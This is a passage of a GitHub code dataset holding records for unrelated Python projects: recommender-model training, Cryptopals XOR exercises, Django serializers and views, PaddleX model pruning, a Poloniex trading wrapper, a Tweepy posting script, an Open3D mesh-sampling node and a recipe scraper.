y_val,\n predict_y > 0.5).astype(float)\n else:\n acc_val = np.equal(\n np.argmax(y_val, 1),\n np.argmax(predict_y, 1)).astype(float)\n train_loss.append(loss_val[0])\n train_acc.append(acc_val)\n if auc_enabled:\n train_auc.append(metrics.roc_auc_score(y_val, predict_y))\n if auc_enabled:\n return np.mean(train_loss), np.mean(train_acc), np.mean(train_auc)\n else:\n return np.mean(train_loss), np.mean(train_acc), 0\n def validate(iterations):\n localiter = range(iterations)\n test_loss = []\n test_acc = []\n test_auc = []\n for it in localiter:\n loss_val, test_y_predicted, y_test_val = executor.run('validate', convert_to_numpy_ret_vals=True)\n if y_test_val.shape[1] == 1: # for criteo case\n correct_prediction = np.equal(\n y_test_val,\n test_y_predicted > 0.5).astype(float)\n else:\n correct_prediction = np.equal(\n np.argmax(y_test_val, 1),\n np.argmax(test_y_predicted, 1)).astype(float)\n test_loss.append(loss_val[0])\n test_acc.append(correct_prediction)\n test_auc.append(metrics.roc_auc_score(y_test_val, test_y_predicted))\n return np.mean(test_loss), np.mean(test_acc), np.mean(test_auc)\n\n def get_shard(data):\n part_size = data.shape[0] // nrank\n start = part_size * rank\n end = start + part_size if rank != nrank - 1 else data.shape[0]\n return data[start:end]\n\n def get_partitioned_shard(data):\n if data_arr is not None:\n return data[np.where(data_arr==rank)]\n else:\n return get_shard(data)\n\n batch_size = args.batch_size\n\n nrank = comm.nRanks.value\n\n dense, sparse, labels = load_dataset(args.dataset, val=False)\n has_dense_feature = dense is not None\n dense_input = [[get_partitioned_shard(dense), batch_size, 'train']] if has_dense_feature else None\n sparse_input = [ht.Dataloader(get_partitioned_shard(sparse).astype(np.int64), batch_size, 'train', use_numpy=True)]\n y_ = [[get_partitioned_shard(labels), batch_size, 'train']]\n\n if args.val:\n val_dense, val_sparse, val_labels = load_dataset(args.dataset, val=True)\n if has_dense_feature:\n dense_input.append([get_shard(val_dense), batch_size, 'validate'])\n sparse_input.append(ht.Dataloader(get_shard(val_sparse).astype(np.int64), batch_size, 'validate', use_numpy=True))\n y_.append([get_shard(val_labels), batch_size, 'validate'])\n\n dense_input = ht.dataloader_op(dense_input) if has_dense_feature else None\n sparse_input = ht.dataloader_op(sparse_input)\n y_ = ht.dataloader_op(y_)\n\n print(\"Data loaded.\")\n models = {\"wdl\" : WDL, \"dcn\" : DCN, \"dfm\" : DFM}\n loss, prediction, y_, train_op = models[args.model](args.dataset, dense_input, sparse_input, y_, args.embed_dim, rank, nrank, device_id,\n args.bound, root_arr, storage_arr)\n\n eval_nodes = {'train': [loss, prediction, y_, train_op]}\n if args.val:\n print('Validation enabled...')\n eval_nodes['validate'] = [loss, prediction, y_]\n executor = ht.Executor(eval_nodes, ctx=ht.gpu(device_id), comm_mode=\"AllReduce\" if nrank > 1 else None, seed=123, log_path='./logs/')\n\n if rank == 0:\n log_file = open(args.output, 'w')\n for ep in range(args.iter // args.log_every):\n ep_st = time.time()\n train_loss, train_acc, train_auc = train(args.log_every)\n ep_en = time.time()\n train_time, train_loss, train_acc, train_auc = comm_sync_data(comm, ep_en - ep_st, train_loss, train_acc, train_auc)\n if rank==0:\n printstr = \"TRAIN %d: loss %.4f acc %.4f time %.4f speed %d\" % (ep * args.log_every, train_loss, train_acc, train_time, args.log_every*batch_size/train_time)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n if args.val and ep > 0 and ep % (args.eval_every // args.log_every) == 0:\n val_loss, val_acc, val_auc = validate(executor.get_batch_num('validate'))\n val_loss, val_acc, val_auc = comm_sync_data(comm, val_loss, val_acc, val_auc)\n if rank==0:\n printstr = \"EVAL %d: val_loss %.4f val_acc %.4f val_auc %.4f\" % (ep * args.log_every, val_loss, val_acc, val_auc)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str, required=True, help=\"[criteo avazu company]\")\n parser.add_argument(\"--model\", type=str, required=True, help=\"[wdl dcn dfm]\")\n parser.add_argument(\"--val\", action=\"store_true\", help=\"whether to use validation\")\n parser.add_argument(\"--bound\", type=int, default=10, help=\"cache bound\")\n parser.add_argument(\"--batch_size\", type=int, default=128, help=\"batch size\")\n parser.add_argument(\"--embed_dim\", type=int, default=128, help=\"embedding dim\")\n parser.add_argument(\"--iter\", type=int, default=10000, help=\"nnumber of iteration\")\n parser.add_argument(\"--log_every\", type=int, default=200)\n parser.add_argument(\"--eval_every\", type=int, default=10000)\n parser.add_argument(\"--store_rate\", type=float, default=0.01)\n parser.add_argument(\"--partition\", type=str, default=None)\n parser.add_argument(\"--output\", type=str, default=\"hetuctr.log\")\n args = parser.parse_args()\n\n comm, device_id = ht.mpi_nccl_init()\n rank = comm.myRank.value\n if args.partition:\n args.partition = osp.normpath(osp.expanduser(args.partition))\n assert osp.exists(args.partition)\n partition = np.load(args.partition)\n data_arr = partition[\"data_partition\"]\n root_arr = partition[\"embed_partition\"]\n storage_arr = partition[str(rank)]\n storage_arr = storage_arr[:int(args.store_rate * len(storage_arr))]\n storage_arr = np.concatenate([np.where(root_arr==rank)[0], storage_arr])\n else:\n data_arr, root_arr, storage_arr = None, None, None\n\n worker(args)\n ht.mpi_nccl_finish(comm)\n","repo_name":"Hsword/SIGMOD2022_HET-GMP","sub_path":"examples/hetuctr.py","file_name":"hetuctr.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"14619488528","text":"import base64\r\nimport re\r\nimport codecs\r\n\r\ndef convert_hex_to_base64(str=\"cXVlc3Rpb24z\"):\r\n return base64.b64encode(str)\r\n\r\n\r\ndef fixed_xor(str1=\"abcdef\", str2=\"qwerty\"):\r\n str_tmp = []\r\n for i in range(0, len(str1)):\r\n str_tmp += [chr(ord(str1[i]) ^ ord(str2[i]))]\r\n str_tmp = \"\".join(str_tmp)\r\n return codecs.encode(str_tmp)\r\n\r\n\r\ndef single_byte_xor_cipher(input_hex_str=\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"):\r\n highest_score = 0\r\n best_result = ''\r\n best_key = None\r\n\r\n # 转换为字节列表\r\n byte_array = bytearray.fromhex(input_hex_str)\r\n\r\n for i in range(256): # 尝试每个可能的key值\r\n # 解密XOR\r\n decoded_bytes = bytes([b ^ i for b in byte_array])\r\n # 仅计算小写字母的数量,因为大写字母的频率通常较低\r\n score = sum(ord('a') <= byte <= ord('z') for byte in decoded_bytes)\r\n\r\n # 更新最佳得分和对应的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_bytes.decode('latin1') # 解码为字符串,假设是latin1编码\r\n best_key = chr(i)\r\n\r\n return best_key, best_result\r\n\r\n\r\n# print(single_byte_xor_cipher())\r\nfrom collections import Counter\r\n\r\n\r\ndef detect_single_character_xor(file_name=\"4.txt\"):\r\n highest_score = 0\r\n best_result = ''\r\n key_candidate = ''\r\n original_cipher = ''\r\n\r\n with open(file_name, \"r\") as file:\r\n for line in file:\r\n hex_string = line.strip() # 去除可能的换行符和空白符\r\n for key_value in range(256): # 扩展至256,因为单字节XOR的可能值有256个\r\n # XOR每个可能的字符,并解码成ASCII\r\n decoded_chars = [chr(key_value ^ int(byte_pair, 16)) for byte_pair in re.findall('.{2}', hex_string)]\r\n decoded_string = ''.join(decoded_chars)\r\n\r\n # 使用Counter来计算每个字符的出现频率\r\n frequency = Counter(decoded_string.lower()) # 将字符串转换为小写进行统计\r\n score = sum(frequency.get(c, 0) for c in 'etaoin shrdlu') # 基于字母频率给字符串打分\r\n\r\n # 更新得到更高分的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_string\r\n key_candidate = chr(key_value)\r\n original_cipher = hex_string\r\n\r\n return original_cipher, key_candidate, best_result\r\n\r\n\r\nprint(\"cXVlc3Rpb24z\")\r\nprint(fixed_xor())\r\nprint(single_byte_xor_cipher())\r\nprint(detect_single_character_xor())\r\n","repo_name":"HumboldtC/XD_CRYPTO","sub_path":"EXP1/3_Cryptopals_set1.py","file_name":"3_Cryptopals_set1.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6399811552","text":"from rest_framework import serializers\nfrom metrics.models import Metric, MetricCollection\n\n\nclass MetricSerializer(serializers.ModelSerializer):\n class Meta:\n model = Metric\n fields = (\n \"time\",\n \"type\",\n \"data\",\n )\n\n\nclass MetricCollectionSerializer(serializers.ModelSerializer):\n metrics = serializers.SerializerMethodField()\n\n class Meta:\n model = MetricCollection\n fields = (\n \"type\",\n \"metrics\",\n )\n\n def get_metrics(self, metric_collection):\n metrics = metric_collection.metrics.all()\n serializer = MetricCollectionSerializer(\n metrics,\n many=True,\n )\n return serializer.data\n","repo_name":"wizenheimer/Arcadian","sub_path":"metrics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31232656842","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLICENSE: MulanPSL2\nAUTHOR: cnhemiya@qq.com\nDATE: 2022-06-05 21:45\n文档说明: 图像分割裁剪\n\"\"\"\n\n\nimport paddlex as pdx\nfrom paddlex import transforms as T\nimport mod.utils\nimport mod.args\nimport mod.config as config\n\n\ndef prune():\n # 解析命令行参数\n args = mod.args.PruneXSeg()\n # 检查文件或目录是否存在\n args.check()\n # 使用 cuda gpu 还是 cpu 运算\n config.user_cude(not args.cpu)\n\n # 定义训练和验证时的 transforms\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/transforms/transforms.md\n train_transforms = T.Compose([\n T.Resize(target_size=512),\n T.RandomHorizontalFlip(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n eval_transforms = T.Compose([\n T.Resize(target_size=512),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n # 定义训练和验证所用的数据集\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/datasets.md\n train_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.train_list,\n label_list=args.label_list,\n transforms=train_transforms,\n num_workers=args.num_workers,\n shuffle=True)\n\n eval_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.eval_list,\n label_list=args.label_list,\n transforms=eval_transforms,\n num_workers=args.num_workers,\n shuffle=False)\n\n # 加载模型\n print(\"读取模型 。。。读取路径:{}\".format(args.model_dir))\n model = pdx.load_model(args.model_dir)\n\n # Step 1/3: 分析模型各层参数在不同的裁剪比例下的敏感度\n # 注意:目标检测模型的裁剪依赖PaddleSlim 2.1.0\n # 注意:如果之前运行过该步骤,第二次运行时会自动加载已有的 'save_dir'/model.sensi.data,不再进行敏感度分析\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#analyze_sensitivity\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n if not args.skip_analyze:\n print(\"敏感度分析 。。。保存路径:{}\".format(args.save_dir))\n model.analyze_sensitivity(\n dataset=eval_dataset,\n batch_size=args.batch_size,\n save_dir=args.save_dir)\n\n # Step 2/3: 根据选择的FLOPs减小比例对模型进行裁剪\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#prune\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n print(\"对模型进行裁剪 。。。FLOPS:{}\".format(args.pruned_flops))\n model.prune(pruned_flops=args.pruned_flops)\n\n # 优化器\n # https://gitee.com/paddlepaddle/PaddleX/blob/develop/paddlex/cv/models/segmenter.py#L189\n\n # 模型训练\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n # 可使用 VisualDL 查看训练指标,参考:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/visualdl.md\n print(\"开始训练 。。。保存路径:{}\".format(args.save_dir))\n model.train(num_epochs=args.epochs,\n train_dataset=train_dataset,\n train_batch_size=args.batch_size,\n eval_dataset=eval_dataset,\n save_dir=args.save_dir,\n save_interval_epochs=args.save_interval_epochs,\n log_interval_steps=args.log_interval_steps,\n learning_rate=args.learning_rate,\n lr_decay_power=args.lr_decay_power,\n early_stop=args.early_stop,\n early_stop_patience=args.early_stop_patience,\n resume_checkpoint=args.resume_checkpoint,\n pretrain_weights=args.pretrain_weights,\n use_vdl=True)\n print(\"结束训练 。。。保存路径:{}\".format(args.save_dir))\n\n\ndef main():\n # 裁剪\n prune()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cnhemiya/bmm-paddle-helper","sub_path":"templates/paddlex_seg/prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"33601277158","text":"from __future__ import print_function, division\n\nimport time\nfrom PIL import Image\nfrom torchvision.transforms import transforms\nfrom transforms.pad_to_square import pad_to_square\nimport numpy as np\n\nfrom utils.utils import AverageMeter, accuracy\nfrom utils.img_utils import compute_gradient, save_img\n\n\ndef test(val_loader, model, device, save_imgs=False, show=False):\n batch_time = AverageMeter()\n\n eval_fingers_recall = AverageMeter()\n eval_fingers_precision = AverageMeter()\n\n eval_frets_recall = AverageMeter()\n eval_frets_precision = AverageMeter()\n\n eval_strings_recall = AverageMeter()\n eval_strings_precision = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n\n for data_idx, data in enumerate(val_loader):\n input = data['image'].float().to(device)\n target = data['fingers'].float().to(device)\n frets = data['frets'].float().to(device)\n strings = data['strings'].float().to(device)\n target_coord = data['finger_coord']\n frets_coord = data['fret_coord']\n strings_coord = data['string_coord']\n img_number = data['img_number']\n\n # compute output\n output = model(input)\n output1 = output[0].split(input.shape[0], dim=0)\n output2 = output[1].split(input.shape[0], dim=0)\n output3 = output[2].split(input.shape[0], dim=0)\n\n if show:\n import matplotlib.pyplot as plt\n import torchvision.transforms as transforms\n fig, ax = plt.subplots(1, 3)\n ax[0].imshow(target[0][0].cpu(), cmap='gray')\n ax[1].imshow(output1[-1][0][0].cpu().detach(), cmap='gray')\n ax[2].imshow(transforms.ToPILImage()(input.cpu()[0]))\n plt.show()\n\n # measure accuracy\n accuracy(output=output1[-1].data, target=target,\n global_precision=eval_fingers_precision, global_recall=eval_fingers_recall, fingers=target_coord,\n min_dist= 10)\n\n accuracy(output=output2[-1].data, target=frets,\n global_precision=eval_frets_precision, global_recall=eval_frets_recall,\n fingers=frets_coord.unsqueeze(0), min_dist=5)\n\n accuracy(output=output3[-1].data, target=strings,\n global_precision=eval_strings_precision, global_recall=eval_strings_recall,\n fingers=strings_coord.unsqueeze(0), min_dist=5)\n\n if save_imgs:\n save_img(input.cpu().detach()[0], output1[-1][0][0].cpu().detach().numpy(), 10, 'image{num}_fingers'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output2[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_frets'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output3[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_strings'.format(num=data['img_number'][0]))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n print('FINGERS: \\t'\n 'Recall(%): {top1:.3f}\\t'\n 'Precision(%): {top2:.3f}\\n'\n 'FRETS: \\t'\n 'Recall(%): {top6:.3f}\\t'\n 'Precision(%): {top7:.3f}\\n'\n 'STRINGS: \\t'\n 'Recall(%): {top11:.3f}\\t'\n 'Precision(%): {top12:.3f}\\n'\n .format(top1=eval_fingers_recall.avg * 100, top2=eval_fingers_precision.avg * 100,\n top6=eval_frets_recall.avg * 100, top7=eval_frets_precision.avg * 100,\n top11=eval_strings_recall.avg * 100, top12=eval_strings_precision.avg * 100))\n\n return eval_fingers_recall.avg, eval_frets_recall.avg, eval_strings_recall.avg, eval_fingers_precision.avg, \\\n eval_frets_precision.avg, eval_strings_precision.avg","repo_name":"AlbertMitjans/chord-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"32180112672","text":"from lib.common.msg import info, warn\nfrom lib.common.id_map_poloniex import id_to_poloniex\nfrom lib.common.id_ticker_map import id_to_ticker\nfrom lib.common.orderbook import estimate_fill_price, FillPriceEstimate\nfrom lib.trader import poloniex_api\nfrom lib.trader.trader import Trader\n\n# limit price estimate is based on (qty requested) x (overcommit_factor)\novercommit_factor = 1.1\n\nclass PoloniexTraderError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\nclass PoloniexTrader(Trader):\n\n @staticmethod\n def handles_sym(sym: str) -> bool:\n return sym in id_to_poloniex.keys()\n\n def __init__(self, sym: str, api_key: str, secret: str):\n self.pair = id_to_poloniex[sym]\n self.ticker = id_to_ticker[sym]\n self.api = poloniex_api.Poloniex(api_key, secret)\n\n def _handle_trade(self, response: dict) -> tuple[float,float]:\n if 'resultingTrades' in response.keys():\n trades = response['resultingTrades']\n total_qty_coin = sum( [float(x['amount']) for x in trades] )\n total_qty_usd = sum( [float(x['total']) for x in trades] )\n fill_price = total_qty_usd / total_qty_coin\n return [fill_price, total_qty_coin]\n elif 'error' in response.keys():\n raise PoloniexTraderError(response['error'])\n else:\n raise PoloniexTraderError(f\"unknown error : {response}\")\n\n\n def buy_market(self, qty: float, qty_in_usd: bool) -> tuple[float,float]:\n self._check_trx_balance()\n if qty_in_usd:\n qty_tokens = qty / self.api.returnTicker(self.pair)\n else:\n qty_tokens = qty\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty_tokens*overcommit_factor)\n response = self.api.buy(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_market(self, qty_tokens: float) -> tuple[float,float]:\n self._check_trx_balance()\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty_tokens*overcommit_factor)\n response = self.api.sell(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_limit(self, qty_tokens: float, limit_price: float, auto_top_up_commission_tokens: bool = False) -> tuple[float,float]:\n if auto_top_up_commission_tokens:\n self._check_trx_balance()\n response = self.api.sell(self.pair, limit_price, qty_tokens, {'fillOrKill': True, 'immediateOrCancel': True})\n return self._handle_trade(response)\n\n\n def estimate_fill_price(self, qty: float, side: str) -> FillPriceEstimate:\n assert side in [\"buy\", \"sell\"]\n if side == \"buy\":\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty*overcommit_factor)\n else:\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty*overcommit_factor)\n\n def get_available_qty(self) -> float:\n return float(self.api.returnBalances()[self.ticker])\n\n def _check_trx_balance(self):\n qty = float(self.api.returnBalances()['TRX'])\n market_price = float(self.api.returnOrderBook(\"USDT_TRX\")['asks'][1][0])\n if qty * market_price < 50:\n add_qty = round(10 / market_price)\n info(f\"PoloniexTrader: buying {add_qty:.1f} additional TRX tokens\")\n self.api.buy(\"USDT_TRX\", market_price*1.01, add_qty, {'fillOrKill': True})\n new_qty = float(self.api.returnBalances()['TRX'])\n if new_qty < add_qty:\n warn(\"PoloniexTrader: failed to buy TRX tokens\")\n","repo_name":"AbigalChulchill/investment-utils","sub_path":"lib/trader/poloniex_trader.py","file_name":"poloniex_trader.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"25522074669","text":"import sys\n\n\ndef dfs(cnt):\n global N, M, num_list, visited\n\n if cnt == M:\n sys.stdout.write(' '.join(answer) + '\\n')\n return\n\n for i in range(N):\n if not visited[i]:\n visited[i] = 1\n answer.append(str(num_list[i]))\n dfs(cnt+1)\n visited[i] = 0\n answer.pop()\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n num_list = sorted(list(map(int, sys.stdin.readline().split())))\n visited = [0 for _ in range(N)]\n answer = []\n\n dfs(0)","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2106/15654.py","file_name":"15654.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6326336893","text":"\nimport copy\nimport bpy\nfrom bpy.props import EnumProperty, IntProperty\nfrom mathutils import Matrix\n\nimport sverchok\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\nfrom sverchok_open3d.dependencies import open3d as o3d\nfrom sverchok.utils.dummy_nodes import add_dummy\n\nif o3d is None:\n add_dummy('SvO3TriangleMeshSamplingNode', 'Triangle Mesh Sampling', 'open3d')\nelse:\n class SvO3TriangleMeshSamplingNode(bpy.types.Node, SverchCustomTreeNode, SvRecursiveNode):\n \"\"\"\n Triggers: O3D Mesh Sampling\n Tooltip: Points over Open3d mesh. Mesh to Point Cloud\n \"\"\"\n bl_idname = 'SvO3TriangleMeshSamplingNode'\n bl_label = 'Triangle Mesh Sampling'\n bl_icon = 'MESH_DATA'\n sv_icon = 'SV_RANDOM_NUM_GEN'\n methods = [\n ('UNIFORM', \"Uniform\", \"Uniform Sampling\", 0),\n ('POISSON', \"Poisson Disk\", \"Poisson Disk Sampling\", 1),\n ]\n normal_methods = [\n ('TRIANGLES', \"From Faces\", \"Calculate Normals From Faces\", 0),\n ('VERTEX', \"From Vertex\", \"Calculate Normals From Vertices\", 1),\n ('NONE', \"None\", \"If mesh does not have normals, the point cloud will not have normals\", 2),\n ]\n\n method: EnumProperty(\n name=\"Method\",\n items=methods,\n default='POISSON',\n update=updateNode)\n normal_method: EnumProperty(\n name=\"Normal\",\n items=normal_methods,\n default='TRIANGLES',\n update=updateNode)\n\n num_points: IntProperty(\n name=\"Point Number\",\n default=100,\n update=updateNode)\n init_factor: IntProperty(\n name=\"Init Factor\",\n description='Initial Points will be Init Factor X Number of points ',\n default=5,\n update=updateNode)\n seed: IntProperty(\n name=\"Seed\",\n description='Random Seed Value, -1 to use a different every update',\n default=1,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvO3TriangleMeshSocket', \"O3D Triangle Mesh\").is_mandatory = True\n num_points = self.inputs.new('SvStringsSocket', \"Points Number\")\n num_points.prop_name = 'num_points'\n num_points.nesting_level = 1\n num_points.pre_processing = 'ONE_ITEM'\n seed = self.inputs.new('SvStringsSocket', \"Seed\")\n seed.prop_name = 'seed'\n seed.nesting_level = 1\n seed.pre_processing = 'ONE_ITEM'\n\n self.outputs.new('SvO3PointCloudSocket', 'O3D Point Cloud')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'method')\n layout.prop(self, 'normal_method')\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, 'list_match')\n self.draw_buttons(context, layout)\n if self.method == 'POISSON':\n layout.prop(self, 'init_factor')\n\n def rclick_menu(self, context, layout):\n layout.prop_menu_enum(self, \"list_match\", text=\"List Match\")\n\n def process_data(self, params):\n\n pcd_out = []\n\n for mesh, points_num, seed in zip(*params):\n\n if self.normal_method == 'TRIANGLES':\n use_triangle_normal = True\n elif self.normal_method == 'VERTEX':\n use_triangle_normal = False\n mesh = copy.deepcopy(mesh)\n mesh.compute_vertex_normals()\n else:\n use_triangle_normal = False\n if self.method == 'POISSON':\n pcd = mesh.sample_points_poisson_disk(\n points_num,\n init_factor=self.init_factor,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n else:\n pcd = mesh.sample_points_uniformly(\n number_of_points=points_num,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n pcd_out.append(pcd)\n\n return pcd_out\n\n\n\ndef register():\n if o3d is not None:\n bpy.utils.register_class(SvO3TriangleMeshSamplingNode)\n\ndef unregister():\n if o3d is not None:\n bpy.utils.unregister_class(SvO3TriangleMeshSamplingNode)\n","repo_name":"vicdoval/sverchok-open3d","sub_path":"nodes/triangle_mesh/triangle_mesh_sampling.py","file_name":"triangle_mesh_sampling.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"35885001249","text":"import requests\nfrom lxml import html\nimport urllib\n\nid = 152293\ndomain = 'https://www.russianfood.com/recipes/recipe.php?rid='\n\ndef getContent(id):\n\n url = domain + str(id)\n\n print('getContent(): send request to %s' % url)\n try:\n r = requests.get(url, timeout=30)\n except Exception as e:\n print(e)\n\n content = ''\n if r.reason == 'OK':\n print('getContent(): status OK')\n \n content = r.text\n \n return content\n\ndef get_products(content):\n tree = html.fromstring(content)\n\n products = []\n for element in tree.xpath('//td[@class=\"padding_l padding_r\"]/span'):\n product = element.text.lower()\n if '-' in product:\n product = product.split(' - ')[0]\n\n products.append(product)\n\n return products\n\ndef get_label(content):\n tree = html.fromstring(content)\n\n label = None\n for element in tree.xpath('//span[@class=\"rcp\"]'):\n label = element.text\n return label\n\ndef get_text(content):\n tree = html.fromstring(content)\n\n text = ''\n for element in tree.xpath('//div[@class=\"step_n\"]/p'):\n text += element.text + ' '\n return text","repo_name":"kuznetsov-m/Datamonetize-hack","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25016010355","text":"#!/Users/htlin/.pyenv/versions/automator/bin/python\n# -*- coding: utf-8 -*-\n# title: tweet\n# date: \"2023-03-25\"\n# @raycast.title Tweet\n# @raycast.author HTLin the 🦎\n# @raycast.authorURL https://github.com/htlin222\n# @raycast.description\n\n# @raycast.icon 🐦\n# @raycast.mode silent\n# @raycast.packageName System\n# @raycast.schemaVersion 1\n\nimport os\nimport yaml\nimport tweepy\nfrom pathlib import Path\n\n# Get path to home directory\nhome_dir = str(Path.home())\n\n# Define path to YAML file\nyaml_path = os.path.join(home_dir, 'KEY', 'twitter.yaml')\n\n# Load API keys and access tokens from YAML file\nwith open(yaml_path, 'r') as file:\n config = yaml.safe_load(file)\n\nconsumer_key = config['consumer_key']\nconsumer_secret = config['consumer_secret']\naccess_token = config['access_token']\naccess_token_secret = config['access_token_secret']\n\n# Authenticate with Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n# Create a tweet\napi.update_status(\"Hello Tweepy\")\n","repo_name":"htlin222/dotfiles","sub_path":"pyscripts.symlink/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"44570018640","text":"from django.http import HttpResponse, Http404\nfrom datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom django.template import loader\n\n\ndef hello(request):\n return HttpResponse('hello, world')\n\n\ndef hours_head(request, offset):\n try:\n offset = int(offset)\n except ValueError:\n raise Http404\n dt = datetime.now() + timedelta(hours=offset)\n html = 'In {}hours, it will be {}.'.format(offset, dt)\n return HttpResponse(html)\n\n\ndef current_datetime(request):\n now = datetime.now()\n t = loader.get_template('current_datetime.html')\n print(request.path)\n print(request.get_host())\n print(request.get_full_path())\n print(request.is_secure())\n values = request.META.items()\n html = []\n for k, v in values:\n html.append((k, v))\n c = {\n 'now': now,\n 'html': html,\n }\n return HttpResponse(t.render(c, request))\n\n\n\ndef searh_form(request):\n return render(request, 'searh_form.html')\n","repo_name":"hdguodada/djangobook","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72463613162","text":"# 치킨 배달(순서가 바뀌어도 결과에 영향이 없으므로 조합)\nfrom itertools import combinations\n\n\ndef get_sum(location_home, case):\n result = 0\n for x1, y1 in location_home:\n temp = int(1e9)\n for x2, y2 in case:\n temp = min(temp, abs(x1 - x2) + abs(y1 - y2))\n result += temp\n return result\n\n\nn, m = map(int, input().split())\ngraph = []\nlocation_home = []\nlocation_chicken = []\nfor i in range(n):\n data = list(map(int, input().split()))\n graph.append(data)\n for j in range(n):\n if data[j] == 1:\n location_home.append((i, j))\n elif data[j] == 2:\n location_chicken.append((i, j))\n\ncases = combinations(location_chicken, m)\nresult = int(1e9)\nfor case in cases:\n result = min(result, get_sum(location_home, case))\n\nprint(result)\n","repo_name":"Dong-Jun-Shin/Study_Algorithm_Python","sub_path":"Coding_test/practice_turn_2/02_implementation/prac_turn2_Q_13.py","file_name":"prac_turn2_Q_13.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23864039380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Recommendation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', 